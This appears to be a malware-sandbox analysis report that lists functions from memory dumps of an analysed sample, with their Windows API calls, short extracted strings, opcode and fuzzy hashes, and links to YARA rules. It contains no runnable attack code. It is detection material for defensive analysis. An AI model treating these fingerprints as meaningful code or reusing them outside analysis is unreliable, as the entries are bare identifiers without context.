Uniqueness Score: -1.00%

Function 02C1A78A, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 02C1A7BC

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 2ff03e97cf481624aac2609f1007e0dd72ccdc49a9e55ba2dc0e6492d9eec56a
Instruction ID: bd522e4801dcc7e652e3b57ce930e8be5f254f0dd0a1203a25936a6aea9b6968
Opcode Fuzzy Hash: 2ff03e97cf481624aac2609f1007e0dd72ccdc49a9e55ba2dc0e6492d9eec56a
Instruction Fuzzy Hash: 1601AD74805240DFDB10CF15D885766FFE4EF45320F08C4AADE088F202D2B9A648DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 02C1B806, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 02C1B841

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b084e941a4ee39d7c037f20a0ba0f03485718e995966c8e818b3699f729714af
Instruction ID: ad13a7febc2588ac795cbc88e26960a1384845819b101e9cb87e64dc6d70f4e9
Opcode Fuzzy Hash: b084e941a4ee39d7c037f20a0ba0f03485718e995966c8e818b3699f729714af
Instruction Fuzzy Hash: 40018F31400644DFEB20CF16D885B66FFA0EF45724F08C49ADE494B222D375A958DF62

Uniqueness

Uniqueness Score: -1.00%

Function 02C1A8EE, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 02C1A926

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 4f4b8be430bd49cf202e66966e23bcea9d6e92f881f171be5a130b51de22113b
Instruction ID: 0e518a6cfefedab64c6b6092346a343c0963521b03a03c2dcbcef2e99f28f56c
Opcode Fuzzy Hash: 4f4b8be430bd49cf202e66966e23bcea9d6e92f881f171be5a130b51de22113b
Instruction Fuzzy Hash: CA01D131401604DFDB20CF16D886762FFA0EF46320F08C4AADE4A0B216C3B5A458DF72

Uniqueness

Uniqueness Score: -1.00%

Function 02C1A372, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 02C1A3A4

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b7b597cd3675e871cc7d4fd30a4f58643c1a8b2b2e39dc3d332156d980e8a549
Instruction ID: a953a43513877811bdc1defcf34eff55f4090f327884d41b6143748d15908d28
Opcode Fuzzy Hash: b7b597cd3675e871cc7d4fd30a4f58643c1a8b2b2e39dc3d332156d980e8a549
Instruction Fuzzy Hash: 1AF0FF34400340EFDB20CF06D885726FFA0EF41320F58C09ADD484B206C2B9E408DE72

Uniqueness

Uniqueness Score: -1.00%

Function 02C1BE3E, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 02C1BE70

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: b7b597cd3675e871cc7d4fd30a4f58643c1a8b2b2e39dc3d332156d980e8a549
Instruction ID: 43f993a42d3c0861e9bb0afaee819f66d150ec63ffb9972498a8d313946db06e
Opcode Fuzzy Hash: b7b597cd3675e871cc7d4fd30a4f58643c1a8b2b2e39dc3d332156d980e8a549
Instruction Fuzzy Hash: 70F0C235804684DFDB20CF06D885762FFA0EF45324F08D4AADE494B312D3B9A948DEA2

Uniqueness

Uniqueness Score: -1.00%

Function 05430682, Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

Z1p^, xrefs: 054306A1, 054306A6

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: Z1p^
API String ID: 0-2514384531
Opcode ID: 94954e9f8d1c0807d7ce08b8958fee3de79bc639373c96075087981be08e3e61
Instruction ID: 2fd68542feb6dbf20aeb2a257432d01356ea9c842784ee59202ac9f3761b109c
Opcode Fuzzy Hash: 94954e9f8d1c0807d7ce08b8958fee3de79bc639373c96075087981be08e3e61
Instruction Fuzzy Hash: 9D41A234A90210CBC7246B38E99E76E7B66FF84301B164B7AE407C72A4CF714C5D9B92

Uniqueness

Uniqueness Score: -1.00%

Function 05431458, Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

$ghr, xrefs: 054314C7

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: $ghr
API String ID: 0-1352911727
Opcode ID: 7d04466889e440ad06c43e56844c41781408a6ba8fe8d0e3c5b81cba75790d5c
Instruction ID: f6ac231d5b919f6ff2a5a14a11627c0673705b1b0a9d38de78a4ea7bae2574e1
Opcode Fuzzy Hash: 7d04466889e440ad06c43e56844c41781408a6ba8fe8d0e3c5b81cba75790d5c
Instruction Fuzzy Hash: DA51D274A04218CFDB54DF68D898BADBBB2BF49300F5040EAD40AAB3A5CB759D85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05431290, Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

$ghr, xrefs: 05431349

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: $ghr
API String ID: 0-1352911727
Opcode ID: aa9611a7f09909848c0f90dd9d4527086311753a4154ddaa4a767c3afee6a45c
Instruction ID: d65cfbd193cf26c36c38773380d043e6930e4bb4ddcfc9adf8173d1180d84bba
Opcode Fuzzy Hash: aa9611a7f09909848c0f90dd9d4527086311753a4154ddaa4a767c3afee6a45c
Instruction Fuzzy Hash: 38412874E04218CFDB14DF68D885BADBBB2BF49340F1044AAD40AAB3A1DB749D85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 054321F8, Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

r*+, xrefs: 0543230F

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: r*+
API String ID: 0-3221063712
Opcode ID: 449ea4cb2c8be9beaed9ddeb3abb7a36b80c79a5a93c72eea57e4e0e1df467ea
Instruction ID: 3b46176182e601a87605cc0e4db786a5a02df86ccd1d3da3305a03de0a84ca36
Opcode Fuzzy Hash: 449ea4cb2c8be9beaed9ddeb3abb7a36b80c79a5a93c72eea57e4e0e1df467ea
Instruction Fuzzy Hash: E441EF34E08209DFCB58DFA5C5466FEBBB2FF49300F1081AAD50297261DBB59A46CF52

Uniqueness

Uniqueness Score: -1.00%

Function 054382C0, Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

r*+, xrefs: 054383D7

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: r*+
API String ID: 0-3221063712
Opcode ID: 97d5640d63801eade27ff39717742dd888d66348dff616f55eea443ca7ae2e75
Instruction ID: 0b1fd6c435d04be34b1847839f7faf7a81d8ecea505d1c53027efa57f317dfcf
Opcode Fuzzy Hash: 97d5640d63801eade27ff39717742dd888d66348dff616f55eea443ca7ae2e75
Instruction Fuzzy Hash: C241FA70E05209DFDB44DBA5C556AEEBBB2FF49300F1484ABE40297360DB759942CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05438108, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

]D1p^, xrefs: 05438136, 0543813B

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: ]D1p^
API String ID: 0-487299572
Opcode ID: 42d769c8b02546500b8df5a06ba992272bff76c4d54dac3d03e81a0cb5503b90
Instruction ID: bc2b83884d26eca85a46eef99421193ee09365f71a0a0297d52327ab649346c6
Opcode Fuzzy Hash: 42d769c8b02546500b8df5a06ba992272bff76c4d54dac3d03e81a0cb5503b90
Instruction Fuzzy Hash: 5F318F30B16204CFCB48EB78E45946EBBB3EB89361355896AE013C73A5DF748C41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0543D9BD, Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

lir, xrefs: 0543DA03

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: lir
API String ID: 0-3872640509
Opcode ID: 5189094b71d3cb73adacb976e624463b4b4c51069b0b2b4a26ca3108be36cb42
Instruction ID: 73f57d83d62f8558d26d1c233d4d59978486eef393a813be8a5168590f0ba22e
Opcode Fuzzy Hash: 5189094b71d3cb73adacb976e624463b4b4c51069b0b2b4a26ca3108be36cb42
Instruction Fuzzy Hash: 7D218975E08214CBCB05DB6894012FEB7E2BF8C7A1F24456BD487EB260EA319846CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0543C080, Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

]?1p^, xrefs: 0543C111, 0543C116

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: ]?1p^
API String ID: 0-2704653929
Opcode ID: 895e50776ad022c66b63584b78c160b61f32a04d9a754cd3ceabc32508305df1
Instruction ID: 48beca4600d52136749f7d7a0dca0862d516057c35d5fad1e75d5b5406fad79c
Opcode Fuzzy Hash: 895e50776ad022c66b63584b78c160b61f32a04d9a754cd3ceabc32508305df1
Instruction Fuzzy Hash: FC11CE35B002608FC7059B38E498B2E3BABFB89311F4509A9E407DB785CF789C81CB94

Uniqueness

Uniqueness Score: -1.00%

Function 05439CEF, Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

Huir, xrefs: 05439D23

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: Huir
API String ID: 0-669697419
Opcode ID: ca20a921b20975c309fa70f3c1fe557640432027a53c9a65dfcf31a2c8a7c40b
Instruction ID: e5068b93fed4a09b6926da7ef0842f4798e05bf482c23d1b698a6c05782980a4
Opcode Fuzzy Hash: ca20a921b20975c309fa70f3c1fe557640432027a53c9a65dfcf31a2c8a7c40b
Instruction Fuzzy Hash: EDF0FC7170411093C7446D6C9C427BD7A5B9BC5670B74432BE916DF3E4DD558C0257A2

Uniqueness

Uniqueness Score: -1.00%

Function 05434710, Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

X1kr, xrefs: 05434747

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: X1kr
API String ID: 0-844551562
Opcode ID: 50c345eb8dc42c79336e1ec98370578e73bf1482c4b0d3714613e068688bcfd5
Instruction ID: 1b13df4a63d0d99d0f0b268bc0f73edd22f8291b8bf4148b1a559377ead2260e
Opcode Fuzzy Hash: 50c345eb8dc42c79336e1ec98370578e73bf1482c4b0d3714613e068688bcfd5
Instruction Fuzzy Hash: 19F024363002609BCB2466B9A4053FE36CB8BCA760F54003FD20AC77A0DE76D8825391

Uniqueness

Uniqueness Score: -1.00%

Function 05437048, Relevance: 1.3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

Huir, xrefs: 0543707B

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: Huir
API String ID: 0-669697419
Opcode ID: 39b39f42ed11fa1cc8e2eee8e83e1028276fa2dfa0a7dbb383782464c8b147d4
Instruction ID: f248613d095b4c93acdacf94e8c529964ec76b7208a0d0b20161400ac55bacd9
Opcode Fuzzy Hash: 39b39f42ed11fa1cc8e2eee8e83e1028276fa2dfa0a7dbb383782464c8b147d4
Instruction Fuzzy Hash: 4DF02BB170811083CB44BE7C9C827BE6E57ABC6670F64436BD51ADB3E9DD118E0253A3

Uniqueness

Uniqueness Score: -1.00%

Function 05437058, Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

Huir, xrefs: 0543707B

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: Huir
API String ID: 0-669697419
Opcode ID: f16dbf35ed607bdad625cef9d73d57167f25602dcc653507278a9685644fcc1d
Instruction ID: 48256945ded93d59e942fc34996ca107277dd864bc108e78894551b9a83fed9a
Opcode Fuzzy Hash: f16dbf35ed607bdad625cef9d73d57167f25602dcc653507278a9685644fcc1d
Instruction Fuzzy Hash: 49F059B030812083C644B96C9C81A7F7E5BEBC6270774032FA60ACB3E8DD519E0213E7

Uniqueness

Uniqueness Score: -1.00%

Function 05435B40, Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

=R1p^, xrefs: 05435B60, 05435B65

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: =R1p^
API String ID: 0-4048283386
Opcode ID: 69b55aa46d08939fb69582b29bcb1fa4e926c454ff949f586da08075552f6663
Instruction ID: 10765a27c5e69d5f22dac6eba6c3743b158daffa22322886efe40cafd7df16fc
Opcode Fuzzy Hash: 69b55aa46d08939fb69582b29bcb1fa4e926c454ff949f586da08075552f6663
Instruction Fuzzy Hash: 15E0867134122457EE04EA6CCC01B67B79EEF85754F65442EE489D7340DD669C0583D1

Uniqueness

Uniqueness Score: -1.00%

Function 05435B50, Relevance: 1.3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

Strings

=R1p^, xrefs: 05435B60, 05435B65

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: =R1p^
API String ID: 0-4048283386
Opcode ID: 42594100b53fafff1fcdc129a68e1dcd3db23645ce2c8a92e8e6af107facacc4
Instruction ID: cfbe4d7483ede684c4f67f3c4300c2d49047039bff020a8a5fe3132c2baf6c37
Opcode Fuzzy Hash: 42594100b53fafff1fcdc129a68e1dcd3db23645ce2c8a92e8e6af107facacc4
Instruction Fuzzy Hash: 0FD05E3034012417AA08E5A9881197A738ECFC5510305845EE80ED7340CD629C0297D1

Uniqueness

Uniqueness Score: -1.00%

Function 02C12477, Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.612556671.0000000002C12000.00000040.00000001.sdmp, Offset: 02C12000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5973cfd36f14fef52552b83b9913bd2078fe509153d303661f4f65a2a52ef7e9
Instruction ID: 733a4fde794ce6618f243a4d3878e7bda7b0543f29fdcb4f304105c3dcade54a
Opcode Fuzzy Hash: 5973cfd36f14fef52552b83b9913bd2078fe509153d303661f4f65a2a52ef7e9
Instruction Fuzzy Hash: 5791B07950E3E58FC7075B3468BB595BF729E5321874A61CBCCD1CB1A3D208484AE72B

Uniqueness

Uniqueness Score: -1.00%

Function 05435BC0, Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e08b09fc8731a431f0b023b6e1b72deed3ad093fc81bc3f5589b8c326950bc3b
Instruction ID: 7e19aa921f28330a4a2d7608c43533d1dc2599f4543aa1a0d675fccb60647e3a
Opcode Fuzzy Hash: e08b09fc8731a431f0b023b6e1b72deed3ad093fc81bc3f5589b8c326950bc3b
Instruction Fuzzy Hash: 5D817231A00619CFCF15CF14C8956EAB7B3BF49304F158596D80AAF261DB71AE8ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 0543A78F, Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52772a9beb0d6bd67818d80b164d63026cfcda5bf6f629d1fd5ab3daec69fc5d
Instruction ID: c58cebe9b9db00ae091f83402f63f817241b57738d5e4826ce492df4b9b42b97
Opcode Fuzzy Hash: 52772a9beb0d6bd67818d80b164d63026cfcda5bf6f629d1fd5ab3daec69fc5d
Instruction Fuzzy Hash: FE81C130B005158BD704EB78C855A6EBBB7FFC5310F608669EA069B798DF709C069BD2

Uniqueness

Uniqueness Score: -1.00%

Function 0543E528, Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab1bcd076864e965b3ab13ef47db7f5b9b5f202147035a3b0c3bd799a93ee9aa
Instruction ID: 54f71fc9f1a4d82bb23a05093fe674579bfa65b28c507c7a2b3dfd27c2655118
Opcode Fuzzy Hash: ab1bcd076864e965b3ab13ef47db7f5b9b5f202147035a3b0c3bd799a93ee9aa
Instruction Fuzzy Hash: 75713A34A05205CFDB14CB69C485BEEBBF6BB4C320F54856AD412A73A0DB30E892CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0543DDC0, Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aba8831af8d366278df9e321dee4ef056ccb5b292ef1b5868615fd16478c59bf
Instruction ID: 7d37b5be875806967592ab8069d141185a3a5d87da8cd8d94346b18e6b7a0b17
Opcode Fuzzy Hash: aba8831af8d366278df9e321dee4ef056ccb5b292ef1b5868615fd16478c59bf
Instruction Fuzzy Hash: F2518031E00618DBCF04DF98D8858FEBBB7FF88350B158556E906AB265DB30AD46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 054371C0, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e3af9300cdb21a0fccb9e9498116ee7a8abb83422dea94338647f5da8a6a1ac
Instruction ID: 3d39bf1fc147f6dde283c849f5ab7d018d0534df1a9ebf55faa47bb360d969a3
Opcode Fuzzy Hash: 6e3af9300cdb21a0fccb9e9498116ee7a8abb83422dea94338647f5da8a6a1ac
Instruction Fuzzy Hash: 8D314A71A04619CFCF15CF24C8556DABBB2FF89304F5184A5D949BB215DBB06B8ACF80

Uniqueness

Uniqueness Score: -1.00%

Function 05436CD0, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42499ac1461933824b526daab11aee0e5999e7a6873ef765dd32ae3a1706e511
Instruction ID: d8f9ab95c217fa209a28f1f601c305b519e11bf24588c0b4aee3d671d073443d
Opcode Fuzzy Hash: 42499ac1461933824b526daab11aee0e5999e7a6873ef765dd32ae3a1706e511
Instruction Fuzzy Hash: D0518231B002159BCB08DBBDC4559EEB7F3AFC8310B25856AC806AB395DF75AC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05437D68, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6b83399fcb71fa84f21f1fd5c2546dacd79fc8892a15b2053011dfb551398b9
Instruction ID: 4a06e05b8f347942487083e9146615d99417f5fafcdef3532972b7e9e68eb2fc
Opcode Fuzzy Hash: d6b83399fcb71fa84f21f1fd5c2546dacd79fc8892a15b2053011dfb551398b9
Instruction Fuzzy Hash: 1F51E4B5D00218CFCB18CFA8D5856DDBBF1FF48310F20866AD59AA72A4E7316956CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05437791, Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 177ef20985a43aec4dd902f419549a4e1712141ed745a85473653e7a3634dad3
Instruction ID: a0a966440dcf11137ed01f7516a9407955fda54302a30b8f88823ff3b2fac7ca
Opcode Fuzzy Hash: 177ef20985a43aec4dd902f419549a4e1712141ed745a85473653e7a3634dad3
Instruction Fuzzy Hash: DD514C74A00214CFDB14DB74C589BADBBF2FF89344F2085AAD4499B3A1DB70AD41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05437FA0, Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 863f22c1e01515c69d1f4eb568bf38a9aaa67a6b3bdc7d84a52e80da627fd95c
Instruction ID: 500f8ff6bee58794456cd6f981f56051b051228dde82aad876620ccf430aabe9
Opcode Fuzzy Hash: 863f22c1e01515c69d1f4eb568bf38a9aaa67a6b3bdc7d84a52e80da627fd95c
Instruction Fuzzy Hash: 0A41A07160110ACBC700CF68D4859AEFBB2FB88314F2186A7E4168B365D771E956CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05436850, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e17766d958a408a80bed349c56f41c9cb07f334034b8aa2b4100ce6136fc22bf
Instruction ID: 40fce9888437639d36e8ad5747a5b0d35364af4f4a00113a6be7f1c3d4eb2e72
Opcode Fuzzy Hash: e17766d958a408a80bed349c56f41c9cb07f334034b8aa2b4100ce6136fc22bf
Instruction Fuzzy Hash: 2941CF34B01210CFC715AF79A0581AE7BE2FB8E311355046DE90697782DFB69C94CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05436860, Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f4f48a228c95581579b511299ddeee9c175714eb6b4da98357878b215e489e8
Instruction ID: c8c97894b1b5053401ea22350138869556383502a24f8c796e66803096d657c6
Opcode Fuzzy Hash: 8f4f48a228c95581579b511299ddeee9c175714eb6b4da98357878b215e489e8
Instruction Fuzzy Hash: DE41CF38B01210CFC715AF79A1581AD7BE2FB8E311355046DED0697782CFB69C51DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0543AB30, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a02d5dd7ffb38685a18d3516502171037b522d977402a8aa65bf8b341466ec14
Instruction ID: 8b4a8106424cd965fe81ab0a5b4b070cf6be2936935943273a9bfbba0a197329
Opcode Fuzzy Hash: a02d5dd7ffb38685a18d3516502171037b522d977402a8aa65bf8b341466ec14
Instruction Fuzzy Hash: 4A31F571B046688FC704DBAAC8955AEBBF2FF89310B24446EE496D7760DB34EC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0543E808, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abaa01c313282052fc607c34212fbffbc4a4450eccf4e7fe85f5b2acdd512ecb
Instruction ID: 73660df839bb897c8c07dbd6909ce99de5e0b8f379ac4177706412d3cdcc1330
Opcode Fuzzy Hash: abaa01c313282052fc607c34212fbffbc4a4450eccf4e7fe85f5b2acdd512ecb
Instruction Fuzzy Hash: 48412D30906B40CFD779CB2AC5417A6BBF6BF89305F14C8AEC09787A61DB75A851CB00

Uniqueness

Uniqueness Score: -1.00%

Function 054302DA, Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a613e33c9b428d3d2814c54860b028860ef533b3bb631918926feb224cd4bea7
Instruction ID: 05dfaea3a193c857c334c5834175e15f67446e9ce3acc4ec7cfa3817c68a0d92
Opcode Fuzzy Hash: a613e33c9b428d3d2814c54860b028860ef533b3bb631918926feb224cd4bea7
Instruction Fuzzy Hash: AF318B34A01215CFDB18CB68C459BBE7BB7EF8C710F2445AAD50AAB3A0DB71AC45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0543DDB1, Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1dd1993cf611774ef2df11edd8a946fc2e7b35b56c2de09ed07afb09b4ce43e
Instruction ID: d281d24630997faae51c6cac861f96e06756f4e5e50cd227cd753b012b6d611f
Opcode Fuzzy Hash: c1dd1993cf611774ef2df11edd8a946fc2e7b35b56c2de09ed07afb09b4ce43e
Instruction Fuzzy Hash: 7D319031E04618DFCB05DFA4C9468FEBFB7BF88340B014466E506AB265DB309D0ADB91

Uniqueness

Uniqueness Score: -1.00%

Function 0543DC99, Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5572d3c26a54f487b4a8011d184c2882af37979b8f8bc4faad7b6e1553d25b6
Instruction ID: c6a6211380e0bbe8bae69e7b3ab8af9e8c0b926894913dac81f9989e970016a4
Opcode Fuzzy Hash: c5572d3c26a54f487b4a8011d184c2882af37979b8f8bc4faad7b6e1553d25b6
Instruction Fuzzy Hash: 81316FB5E01204DFC754CF68C545AEEBBF2BB8C250F14916AD40AA7360DB35DC42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 054320D0, Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c55931cfbe5c63c626c9636b542759b401f243b556c724a3c48a968c36f50187
Instruction ID: 75f54bfa2d662eb3d523cef5ec5d274e31b13cacd2590fba390bbdbde1a46723
Opcode Fuzzy Hash: c55931cfbe5c63c626c9636b542759b401f243b556c724a3c48a968c36f50187
Instruction Fuzzy Hash: 77318234B08255DFDF00DF68D9826BE7BB6FB88340F158067C6069B2A5DBB4AC52C791

Uniqueness

Uniqueness Score: -1.00%

Function 054345C8, Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced80e2c35495f5aaa2b1c2e4164705fb785f20495dac5b839b81271e8c30a46
Instruction ID: d07667a8f434fbf849f11cf41ef7ca250319e154bc7059f2649f81239830bcb0
Opcode Fuzzy Hash: ced80e2c35495f5aaa2b1c2e4164705fb785f20495dac5b839b81271e8c30a46
Instruction Fuzzy Hash: 04219171F041199BDF04DEA8D886AFFB7FAFB88300F204177D619D3250EA745A158BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0543E208, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ba89ee82e045f4799fa3eb943ad0fb5f5e235e0fb3265ca6684cda5ab5b4792
Instruction ID: efed20bec62335b3e32ea14fddc6d2b9bbaafe09ce29b12e8b5d9d4f0c929898
Opcode Fuzzy Hash: 0ba89ee82e045f4799fa3eb943ad0fb5f5e235e0fb3265ca6684cda5ab5b4792
